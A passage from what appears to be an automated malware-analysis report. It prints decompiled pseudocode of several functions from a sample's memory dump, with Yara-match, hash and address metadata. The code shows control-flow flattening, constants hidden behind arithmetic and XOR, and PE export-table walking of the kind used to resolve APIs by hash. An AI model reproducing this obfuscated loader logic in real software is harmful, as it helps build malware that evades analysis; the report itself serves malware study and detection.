							if(_t196 == 0) {
								goto L23;
							}
							_t238 = 0x35a1dc77;
							continue;
						}
						if(_t238 != 0x1b0233d2) {
							goto L20;
						} else {
							_t199 =  *0x24ca2c; // 0x698300
							E00246128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
							_t202 =  *0x24ca2c; // 0x698300
							_t211 = _v16;
							_t243 =  &(_t243[5]);
							_t205 = 1;
							_t238 = 0x24090f6a;
							 *(_t202 + 0x450) = _v16;
							continue;
						}
					}
					if(_t238 == 0x2394b362) {
						_t242 = E0023F4D0(_t211);
						_t238 = 0x155b4458;
						goto L20;
					}
					if(_t238 == 0x24090f6a) {
						E0023F536(_v100, _v44, _v72, _v32);
						_pop(_t211);
						_t238 = 0x8b9146f;
						goto L1;
					}
					if(_t238 != 0x35a1dc77) {
						goto L20;
					}
					_t238 = 0x8b9146f;
					if(_v36 > 2) {
						_t211 = _v48;
						_t204 = E0023EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
						_t243 =  &(_t243[4]);
						_v32 = _t204;
						if(_t204 != 0) {
							_t238 = 0x93670d9;
						}
					}
					goto L1;
					L20:
				} while (_t238 != 0x36620d3);
				goto L23;
			}











































                                                      0x002473ac
                                                      0x002473af
                                                      0x002473ba
                                                      0x002473bc
                                                      0x002473c0
                                                      0x002473c8
                                                      0x002473d0
                                                      0x002473d8
                                                      0x002473e0
                                                      0x002473f2
                                                      0x002473f6
                                                      0x002473ff
                                                      0x00247404
                                                      0x0024740a
                                                      0x00247412
                                                      0x0024741e
                                                      0x00247423
                                                      0x00247429
                                                      0x00247431
                                                      0x00247439
                                                      0x00247441
                                                      0x00247449
                                                      0x00247451
                                                      0x00247456
                                                      0x0024745e
                                                      0x00247466
                                                      0x0024746e
                                                      0x00247476
                                                      0x0024747b
                                                      0x00247480
                                                      0x00247488
                                                      0x00247495
                                                      0x00247496
                                                      0x0024749a
                                                      0x002474a2
                                                      0x002474aa
                                                      0x002474b2
                                                      0x002474ba
                                                      0x002474c2
                                                      0x002474ca
                                                      0x002474cf
                                                      0x002474d7
                                                      0x002474df
                                                      0x002474e7
                                                      0x002474ef
                                                      0x002474f7
                                                      0x002474ff
                                                      0x00247507
                                                      0x0024750c
                                                      0x00247514
                                                      0x0024751c
                                                      0x00247524
                                                      0x0024752c
                                                      0x00247534
                                                      0x00247538
                                                      0x00247540
                                                      0x00247548
                                                      0x00247550
                                                      0x00247558
                                                      0x00247560
                                                      0x00247565
                                                      0x0024756d
                                                      0x0024757b
                                                      0x0024757f
                                                      0x00247587
                                                      0x00247597
                                                      0x0024759c
                                                      0x002475a2
                                                      0x002475aa
                                                      0x002475b2
                                                      0x002475ba
                                                      0x002475bf
                                                      0x002475c4
                                                      0x002475cc
                                                      0x002475d9
                                                      0x002475da
                                                      0x002475e4
                                                      0x002475e8
                                                      0x002475ec
                                                      0x002475f4
                                                      0x002475f8
                                                      0x002475f8
                                                      0x002475fc
                                                      0x002475fc
                                                      0x002475fc
                                                      0x002475fc
                                                      0x00247602
                                                      0x00000000
                                                      0x00000000
                                                      0x00247608
                                                      0x002476e2
                                                      0x00000000
                                                      0x002476e2
                                                      0x00247614
                                                      0x00247793
                                                      0x0024779c
                                                      0x002477a2
                                                      0x002477a2
                                                      0x00247620
                                                      0x002476c4
                                                      0x002476ce
                                                      0x002476d6
                                                      0x002476d7
                                                      0x00000000
                                                      0x002476d7
                                                      0x0024762c
                                                      0x00247698
                                                      0x0024769d
                                                      0x002476a0
                                                      0x002476a3
                                                      0x00000000
                                                      0x00000000
                                                      0x002476a9
                                                      0x00000000
                                                      0x002476a9
                                                      0x00247634
                                                      0x00000000
                                                      0x0024763a
                                                      0x00247648
                                                      0x00247662
                                                      0x00247667
                                                      0x0024766e
                                                      0x00247675
                                                      0x00247678
                                                      0x00247679
                                                      0x0024767e
                                                      0x00000000
                                                      0x0024767e
                                                      0x00247634
                                                      0x002476f2
                                                      0x00247774
                                                      0x00247776
                                                      0x00000000
                                                      0x00247776
                                                      0x002476fa
                                                      0x0024775a
                                                      0x00247760
                                                      0x00247761
                                                      0x00000000
                                                      0x00247761
                                                      0x00247702
                                                      0x00000000
                                                      0x00000000
                                                      0x00247709
                                                      0x0024770e
                                                      0x00247728
                                                      0x0024772c
                                                      0x00247731
                                                      0x00247734
                                                      0x0024773a
                                                      0x00247740
                                                      0x00247740
                                                      0x0024773a
                                                      0x00000000
                                                      0x0024777b
                                                      0x0024777b
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 'V$\$bo
                                                      • API String ID: 0-4178943049
                                                      • Opcode ID: 9d8106d64d37aca7ba755c0e74fa21ee2a66ddb5366a682e1964e58cb55c0f73
                                                      • Instruction ID: 4358f4c8da5ddb53ae57625263d1a3a9b9e3a93a8aba7f791c9e13e457b45644
                                                      • Opcode Fuzzy Hash: 9d8106d64d37aca7ba755c0e74fa21ee2a66ddb5366a682e1964e58cb55c0f73
                                                      • Instruction Fuzzy Hash: 46A1537151C3428FD358CF28C48940BFBF2FBC4758F51892DF5AA96260C7B58A588F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002396CD, Relevance: 3.9, Strings: 3, Instructions: 191COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E002396CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t162;
				signed int _t179;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t200;
				intOrPtr* _t222;
				signed int* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_t223 = __ecx;
				_push(_t222);
				_push(__ecx);
				E0023602B(_t162);
				_v80 = 0xadf4;
				_t226 =  &(( &_v140)[4]);
				_t200 = 0xade8ac2;
				_t193 = 0x38;
				_v80 = _v80 / _t193;
				_v80 = _v80 ^ 0x00005e4d;
				_v88 = 0xd682;
				_v88 = _v88 ^ 0xf51d39be;
				_v88 = _v88 ^ 0xf51dab09;
				_v96 = 0x72b2;
				_v96 = _v96 ^ 0xfa4c809d;
				_v96 = _v96 ^ 0xfa4c99cb;
				_v116 = 0x90ca;
				_v116 = _v116 | 0x91d06c09;
				_v116 = _v116 ^ 0x5d2d7dc0;
				_v116 = _v116 ^ 0xccfdf140;
				_v124 = 0x94f4;
				_v124 = _v124 >> 9;
				_t194 = 0x7e;
				_v124 = _v124 / _t194;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00005a93;
				_v92 = 0xb2da;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x00004526;
				_v132 = 0xfe39;
				_v132 = _v132 ^ 0x94a2bb32;
				_v132 = _v132 + 0xffff197d;
				_v132 = _v132 + 0xa385;
				_v132 = _v132 ^ 0x94a23d21;
				_v104 = 0xe4d2;
				_v104 = _v104 ^ 0x49cfaa80;
				_v104 = _v104 | 0x48b9e868;
				_v104 = _v104 ^ 0x49ffe136;
				_v112 = 0xb598;
				_v112 = _v112 ^ 0x0d96fbe5;
				_v112 = _v112 + 0x88b9;
				_v112 = _v112 ^ 0x0d96d484;
				_v136 = 0x3e03;
				_v136 = _v136 ^ 0x29ac334c;
				_v136 = _v136 >> 9;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x14d602a1;
				_v120 = 0xd3c3;
				_t195 = 0x26;
				_v120 = _v120 / _t195;
				_t196 = 0x3e;
				_v120 = _v120 * 0x17;
				_v120 = _v120 ^ 0x0000f1c0;
				_v140 = 0x72b1;
				_v140 = _v140 + 0xffffab40;
				_v140 = _v140 << 0xe;
				_v140 = _v140 / _t196;
				_v140 = _v140 ^ 0x001e8f72;
				_v128 = 0x9994;
				_v128 = _v128 + 0xffff8c6c;
				_v128 = _v128 + 0xa4f6;
				_t197 = 0x3d;
				_v128 = _v128 / _t197;
				_v128 = _v128 ^ 0x00001242;
				_v100 = 0x8258;
				_v100 = _v100 + 0xffff85b7;
				_v100 = _v100 * 0x51;
				_v100 = _v100 ^ 0x000280a1;
				_v84 = 0x5c44;
				_v84 = _v84 ^ 0x1285eccb;
				_v84 = _v84 ^ 0x12858e57;
				_v108 = 0x7f88;
				_v108 = _v108 | 0x4d438ffe;
				_v108 = _v108 + 0xffff02b4;
				_v108 = _v108 ^ 0x4d436acf;
				do {
					while(_t200 != 0xade8ac2) {
						if(_t200 == 0xeed9730) {
							_push(_t200);
							_push(_t200);
							_t179 = E00238736(_t223[1]);
							 *_t223 = _t179;
							__eflags = _t179;
							if(__eflags != 0) {
								_t200 = 0x173d5c4e;
								continue;
							}
						} else {
							if(_t200 == 0xffe2862) {
								E0024360F( &_v76, _v120, _v140,  *_t222, _v128);
								_t226 =  &(_t226[3]);
								_t200 = 0x220c9c88;
								continue;
							} else {
								if(_t200 == 0x173d5c4e) {
									E002450F2( &_v76, _v104, _v112, _v136, _t223);
									_t226 =  &(_t226[3]);
									_t200 = 0xffe2862;
									continue;
								} else {
									if(_t200 == 0x220c9c88) {
										E00237998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
									} else {
										if(_t200 != 0x2d9f638c) {
											goto L13;
										} else {
											_t207 = _t222;
											_t223[1] = E00247A0F(_t222);
											_t192 = E002378A5(_t222, _t207, 0x1000, _t207, 0x400);
											_t226 =  &(_t226[4]);
											_t200 = 0xeed9730;
											_t223[1] = _t223[1] + _t192;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t223;
						_t161 =  *_t223 != 0;
						__eflags = _t161;
						return 0 | _t161;
					}
					 *_t223 = 0;
					_t200 = 0x2d9f638c;
					_t223[1] = 0;
					L13:
					__eflags = _t200 - 0x18ac994b;
				} while (__eflags != 0);
				goto L16;
			}
































                                                      0x002396d7
                                                      0x002396de
                                                      0x002396e5
                                                      0x002396e7
                                                      0x002396e9
                                                      0x002396ea
                                                      0x002396ef
                                                      0x002396f7
                                                      0x00239700
                                                      0x00239707
                                                      0x0023970c
                                                      0x00239712
                                                      0x0023971a
                                                      0x00239722
                                                      0x0023972a
                                                      0x00239732
                                                      0x0023973a
                                                      0x00239742
                                                      0x0023974a
                                                      0x00239752
                                                      0x0023975a
                                                      0x00239762
                                                      0x0023976a
                                                      0x00239772
                                                      0x0023977b
                                                      0x00239780
                                                      0x00239786
                                                      0x0023978a
                                                      0x00239792
                                                      0x0023979a
                                                      0x0023979f
                                                      0x002397a7
                                                      0x002397af
                                                      0x002397b7
                                                      0x002397bf
                                                      0x002397c7
                                                      0x002397cf
                                                      0x002397d7
                                                      0x002397df
                                                      0x002397e7
                                                      0x002397ef
                                                      0x002397f7
                                                      0x002397ff
                                                      0x00239807
                                                      0x0023980f
                                                      0x00239817
                                                      0x0023981f
                                                      0x00239824
                                                      0x00239829
                                                      0x00239831
                                                      0x0023983d
                                                      0x00239842
                                                      0x0023984d
                                                      0x0023984e
                                                      0x00239852
                                                      0x0023985a
                                                      0x00239862
                                                      0x0023986a
                                                      0x00239875
                                                      0x00239879
                                                      0x00239883
                                                      0x00239890
                                                      0x00239898
                                                      0x002398a6
                                                      0x002398a9
                                                      0x002398ad
                                                      0x002398b5
                                                      0x002398bd
                                                      0x002398ca
                                                      0x002398ce
                                                      0x002398d6
                                                      0x002398de
                                                      0x002398e6
                                                      0x002398ee
                                                      0x002398f6
                                                      0x002398fe
                                                      0x00239906
                                                      0x00239910
                                                      0x00239910
                                                      0x00239922
                                                      0x002399d7
                                                      0x002399d8
                                                      0x002399dc
                                                      0x002399e1
                                                      0x002399e5
                                                      0x002399e7
                                                      0x002399e9
                                                      0x00000000
                                                      0x002399e9
                                                      0x00239928
                                                      0x0023992e
                                                      0x002399b9
                                                      0x002399be
                                                      0x002399c1
                                                      0x00000000
                                                      0x00239930
                                                      0x00239932
                                                      0x00239995
                                                      0x0023999a
                                                      0x0023999d
                                                      0x00000000
                                                      0x00239934
                                                      0x0023993a
                                                      0x00239a1d
                                                      0x00239940
                                                      0x00239946
                                                      0x00000000
                                                      0x0023994c
                                                      0x0023994c
                                                      0x00239953
                                                      0x00239972
                                                      0x00239977
                                                      0x0023997a
                                                      0x0023997f
                                                      0x00000000
                                                      0x0023997f
                                                      0x00239946
                                                      0x0023993a
                                                      0x00239932
                                                      0x0023992e
                                                      0x00239a26
                                                      0x00239a28
                                                      0x00239a2c
                                                      0x00239a2c
                                                      0x00239a36
                                                      0x00239a36
                                                      0x002399f0
                                                      0x002399f2
                                                      0x002399f7
                                                      0x002399fa
                                                      0x002399fa
                                                      0x002399fa
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &E$D\$M^
                                                      • API String ID: 0-182273106
                                                      • Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                                      • Instruction ID: 5273681e539744de221480bce5bbc0da8f6f74133b7dac2cdd75fba39104ce74
                                                      • Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                                      • Instruction Fuzzy Hash: 9F8164B15183819FD368CF25C88991BBBF0BBD9354F50891CF196862A1D3B6CA99CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023153C, Relevance: 3.9, Strings: 3, Instructions: 131COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0023153C() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t122;
				signed int _t134;
				void* _t136;
				signed int _t137;
				signed int* _t138;

				_t138 =  &_v560;
				_v528 = 0xa2e9;
				_v528 = _v528 + 0xfffffe64;
				_t119 = 0x3a74a7f9;
				_v528 = _v528 ^ 0x0000e8bc;
				_v532 = 0xc148;
				_v532 = _v532 + 0x228e;
				_v532 = _v532 ^ 0x0000dc63;
				_v548 = 0x43c;
				_v548 = _v548 + 0xffff6922;
				_v548 = _v548 | 0xfd2a2fe1;
				_v548 = _v548 ^ 0xb6db9be5;
				_v548 = _v548 ^ 0x4924f3d5;
				_v544 = 0x1b71;
				_v544 = _v544 ^ 0xba1667e6;
				_v544 = _v544 >> 2;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x42cfc722;
				_v540 = 0x29dd;
				_v540 = _v540 + 0xa2;
				_v540 = _v540 ^ 0xc29808bd;
				_v540 = _v540 + 0xffff2b53;
				_v540 = _v540 ^ 0xc2975a13;
				_v556 = 0x7857;
				_v556 = _v556 ^ 0xa059c8e7;
				_v556 = _v556 << 9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x361613d4;
				_v560 = 0x6ef2;
				_v560 = _v560 ^ 0x7dc12174;
				_v560 = _v560 * 0x52;
				_t136 = 0;
				_v560 = _v560 ^ 0x47eb388f;
				_v536 = 0x33fe;
				_v536 = _v536 + 0x28fb;
				_v536 = _v536 ^ 0x000029c0;
				_v552 = 0x40f6;
				_v552 = _v552 | 0x9b4debbc;
				_v552 = _v552 + 0x1ce1;
				_t134 = 0x7e;
				_t137 = _v536;
				_t135 = _v536;
				_v552 = _v552 / _t134;
				_v552 = _v552 ^ 0x013b83e5;
				_v524 = 0xe5bd;
				_v524 = _v524 ^ 0x97a1ef4c;
				_v524 = _v524 ^ 0x97a11b87;
				do {
					while(_t119 != 0x6cc9294) {
						if(_t119 == 0xcd96d8e) {
							_v560 = 0x65f6;
							_t122 = 0x33;
							_v560 = _v560 / _t122;
							_v560 = _v560 + 0xffffea35;
							_v560 = _v560 ^ 0xd5d8ecd6;
							_t136 =  ==  ? 1 : _t136;
						} else {
							if(_t119 == 0x11374e9c) {
								E0023E29C(_v552, _v524, _t137);
								_t119 = 0xcd96d8e;
								continue;
							} else {
								if(_t119 == 0x31a842b3) {
									_t116 = E00238697();
									_t135 = _t116;
									if(_t116 != 0) {
										_t119 = 0x34255e69;
										continue;
									}
								} else {
									if(_t119 == 0x34255e69) {
										_t117 = E002360B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
										_t138 =  &(_t138[5]);
										if(_t117 != 0) {
											_t119 = 0x6cc9294;
											continue;
										}
									} else {
										if(_t119 != 0x3a74a7f9) {
											goto L14;
										} else {
											_t119 = 0x31a842b3;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t136;
					}
					_t137 = E002328CE( &_v520, _v560, _v536);
					_t119 = 0x11374e9c;
					L14:
				} while (_t119 != 0x55f7722);
				goto L17;
			}






















                                                      0x0023153c
                                                      0x00231546
                                                      0x00231550
                                                      0x00231558
                                                      0x0023155d
                                                      0x00231565
                                                      0x0023156d
                                                      0x00231575
                                                      0x0023157d
                                                      0x00231585
                                                      0x0023158d
                                                      0x00231595
                                                      0x0023159d
                                                      0x002315a5
                                                      0x002315ad
                                                      0x002315b5
                                                      0x002315ba
                                                      0x002315bf
                                                      0x002315c7
                                                      0x002315cf
                                                      0x002315d7
                                                      0x002315df
                                                      0x002315e7
                                                      0x002315ef
                                                      0x002315f7
                                                      0x002315ff
                                                      0x00231604
                                                      0x00231609
                                                      0x00231611
                                                      0x00231619
                                                      0x00231626
                                                      0x0023162a
                                                      0x0023162c
                                                      0x00231634
                                                      0x0023163c
                                                      0x00231644
                                                      0x0023164c
                                                      0x00231654
                                                      0x0023165c
                                                      0x0023166a
                                                      0x0023166d
                                                      0x00231675
                                                      0x00231679
                                                      0x0023167d
                                                      0x00231685
                                                      0x0023168d
                                                      0x00231695
                                                      0x0023169d
                                                      0x0023169d
                                                      0x002316af
                                                      0x0023176c
                                                      0x0023177c
                                                      0x0023177f
                                                      0x00231785
                                                      0x0023178e
                                                      0x0023179c
                                                      0x002316b5
                                                      0x002316bb
                                                      0x00231733
                                                      0x0023173b
                                                      0x00000000
                                                      0x002316bd
                                                      0x002316c3
                                                      0x00231715
                                                      0x0023171a
                                                      0x0023171e
                                                      0x00231720
                                                      0x00000000
                                                      0x00231720
                                                      0x002316c5
                                                      0x002316cb
                                                      0x002316f6
                                                      0x002316fb
                                                      0x00231700
                                                      0x00231706
                                                      0x00000000
                                                      0x00231706
                                                      0x002316cd
                                                      0x002316d3
                                                      0x00000000
                                                      0x002316d9
                                                      0x002316d9
                                                      0x00000000
                                                      0x002316d9
                                                      0x002316d3
                                                      0x002316cb
                                                      0x002316c3
                                                      0x002316bb
                                                      0x002317a0
                                                      0x002317ab
                                                      0x002317ab
                                                      0x00231757
                                                      0x00231759
                                                      0x0023175e
                                                      0x0023175e
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Wx$i^%4$i^%4
                                                      • API String ID: 0-1584002782
                                                      • Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                                      • Instruction ID: 39f4710d89ebfa78ed42010ac6efb6bf4a3a7838aa570a9a997faf1b45a316ed
                                                      • Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                                      • Instruction Fuzzy Hash: 535158711183428FD398CE25C58A42BFBE1BBC4758F140E1DF496962A0D7B4CA69CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00247D03, Relevance: 3.9, Strings: 3, Instructions: 127COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E00247D03() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t105;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				void* _t119;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v44;
				_v8 = 0x68fc;
				_v8 = _v8 + 0xbb36;
				_v8 = _v8 ^ 0x000162e9;
				_v44 = 0xabcf;
				_t114 = 0x5a;
				_v44 = _v44 / _t114;
				_v44 = _v44 << 5;
				_t129 = 0x1aabdcf3;
				_v44 = _v44 ^ 0x41a75d37;
				_v44 = _v44 ^ 0x41a744f3;
				_v12 = 0xa837;
				_v12 = _v12 + 0xbdd3;
				_v12 = _v12 ^ 0x0001592e;
				_v36 = 0x1a64;
				_v36 = _v36 + 0x1ecf;
				_v36 = _v36 | 0x383b765c;
				_v36 = _v36 ^ 0x383b27b5;
				_v40 = 0x1cb7;
				_v40 = _v40 | 0xfad83379;
				_t115 = 0x73;
				_v40 = _v40 / _t115;
				_v40 = _v40 ^ 0x022e74ac;
				_v16 = 0x5673;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x00050551;
				_v20 = 0x8ddb;
				_v20 = _v20 + 0xffffc9bf;
				_t116 = 0x22;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x001c9060;
				_v24 = 0x24b0;
				_v24 = _v24 ^ 0x7eaabc9b;
				_v24 = _v24 ^ 0x558f972f;
				_v24 = _v24 ^ 0x2b251b7e;
				_v28 = 0xbf97;
				_v28 = _v28 + 0xffff41a2;
				_v28 = _v28 * 0x14;
				_v28 = _v28 ^ 0x00001fe8;
				_v32 = 0x3a57;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x30418ed0;
				_v32 = _v32 ^ 0x30407688;
				_v4 = 0xf5c8;
				_v4 = _v4 / _t116;
				_v4 = _v4 ^ 0x00000add;
				_t117 =  *0x24ca30; // 0x0
				do {
					while(_t129 != 0x15241428) {
						if(_t129 == 0x1aabdcf3) {
							_push(_t117);
							_push(_t117);
							_t119 = 0x2c;
							_t117 = E00238736(_t119);
							 *0x24ca30 = _t117;
							if(_t117 != 0) {
								_t129 = 0x337355f8;
								continue;
							}
						} else {
							if(_t129 != 0x337355f8) {
								goto L8;
							} else {
								_push(_t117);
								_t112 = E002359D5(_t117, _v36, _t117, _v40, _v16);
								_t117 =  *0x24ca30; // 0x0
								_t131 =  &(_t131[5]);
								_t129 = 0x15241428;
								 *((intOrPtr*)(_t117 + 8)) = _t112;
								continue;
							}
						}
						goto L9;
					}
					_push(_t117);
					_t105 = E00231132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E0023E377);
					_t117 =  *0x24ca30; // 0x0
					_t131 =  &(_t131[9]);
					_t129 = 0x3afebe4c;
					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
					L8:
				} while (_t129 != 0x3afebe4c);
				L9:
				return 0 | _t117 != 0x00000000;
			}























                                                      0x00247d03
                                                      0x00247d06
                                                      0x00247d10
                                                      0x00247d18
                                                      0x00247d20
                                                      0x00247d30
                                                      0x00247d35
                                                      0x00247d3b
                                                      0x00247d40
                                                      0x00247d45
                                                      0x00247d52
                                                      0x00247d5f
                                                      0x00247d6c
                                                      0x00247d74
                                                      0x00247d7c
                                                      0x00247d84
                                                      0x00247d8c
                                                      0x00247d94
                                                      0x00247d9c
                                                      0x00247da4
                                                      0x00247db0
                                                      0x00247db5
                                                      0x00247dbb
                                                      0x00247dc3
                                                      0x00247dcb
                                                      0x00247dd0
                                                      0x00247dd8
                                                      0x00247de0
                                                      0x00247ded
                                                      0x00247dee
                                                      0x00247df2
                                                      0x00247dfa
                                                      0x00247e02
                                                      0x00247e0a
                                                      0x00247e12
                                                      0x00247e1a
                                                      0x00247e22
                                                      0x00247e2f
                                                      0x00247e33
                                                      0x00247e3b
                                                      0x00247e43
                                                      0x00247e48
                                                      0x00247e50
                                                      0x00247e58
                                                      0x00247e66
                                                      0x00247e6a
                                                      0x00247e72
                                                      0x00247e78
                                                      0x00247e78
                                                      0x00247e82
                                                      0x00247eb7
                                                      0x00247eb8
                                                      0x00247ebb
                                                      0x00247ec3
                                                      0x00247ec5
                                                      0x00247ecd
                                                      0x00247ecf
                                                      0x00000000
                                                      0x00247ecf
                                                      0x00247e84
                                                      0x00247e86
                                                      0x00000000
                                                      0x00247e88
                                                      0x00247e88
                                                      0x00247e96
                                                      0x00247e9b
                                                      0x00247ea1
                                                      0x00247ea4
                                                      0x00247ea6
                                                      0x00000000
                                                      0x00247ea6
                                                      0x00247e86
                                                      0x00000000
                                                      0x00247e82
                                                      0x00247ed3
                                                      0x00247ef1
                                                      0x00247ef6
                                                      0x00247efc
                                                      0x00247eff
                                                      0x00247f01
                                                      0x00247f04
                                                      0x00247f04
                                                      0x00247f0d
                                                      0x00247f1a

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: W:$\v;8$sV
                                                      • API String ID: 0-492820393
                                                      • Opcode ID: 7f485dfd548d40d57caa53e3dc0af1f2cfa7d50b8ed3ce7bcbb9a74163955e90
                                                      • Instruction ID: be63e9ef7a2168ff48f048429fd6eb85a429d8fb2f5db673e0252099f683f720
                                                      • Opcode Fuzzy Hash: 7f485dfd548d40d57caa53e3dc0af1f2cfa7d50b8ed3ce7bcbb9a74163955e90
                                                      • Instruction Fuzzy Hash: 1C51A9B11193019FD358CF25D88A81FBBE1FB89358F500A1DF4969A2A0D3B5CA59CF87
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023E05A, Relevance: 3.9, Strings: 3, Instructions: 126COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0023E05A(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _t107;
				signed short _t113;
				signed short _t116;
				signed short _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				intOrPtr _t124;
				signed short _t128;
				signed short* _t143;
				signed short _t145;
				void* _t146;
				signed int* _t147;

				_t147 =  &_v48;
				_v16 = 0x6d293b;
				_v12 = 0x468ef5;
				_v8 = 0;
				_v4 = 0;
				_t146 = __ecx;
				_v40 = 0x7b4e;
				_v40 = _v40 + 0xffff3b83;
				_v40 = _v40 + 0xffffa7a8;
				_v40 = _v40 ^ 0xffff5e78;
				_v20 = 0xb6a1;
				_t120 = 0x38;
				_v20 = _v20 / _t120;
				_v20 = _v20 ^ 0x00007f71;
				_v44 = 0x997f;
				_v44 = _v44 ^ 0xba9196e9;
				_v44 = _v44 ^ 0x66374254;
				_t26 =  &_v44; // 0x66374254
				_t121 = 0xe;
				_v44 =  *_t26 / _t121;
				_v44 = _v44 ^ 0x0fc29c0d;
				_v48 = 0x4c26;
				_v48 = _v48 | 0xfd76fef6;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x1faed217;
				_v24 = 0xc5b2;
				_t122 = 0x42;
				_v24 = _v24 * 0x67;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x9f1566f7;
				_v28 = 0x55d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 / _t122;
				_v28 = _v28 ^ 0x0000f55e;
				_v32 = 0x8f6f;
				_t123 = 6;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 + 0xffffe8fc;
				_v32 = _v32 ^ 0x002c0f4c;
				_v36 = 0xd672;
				_v36 = _v36 / _t123;
				_v36 = _v36 + 0xffffc0a7;
				_v36 = _v36 ^ 0xffffa997;
				_t107 = _v40;
				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t145 = _t124 + __ecx;
					while(1) {
						_t110 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t128 = E00244AAF(_t110 + _t146, _v20, _v44, _v48);
						_v40 = _t128;
						__eflags = _t128;
						if(_t128 == 0) {
							L15:
							return 0;
						}
						_t143 =  *_t145 + _t146;
						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t113 =  *_t143;
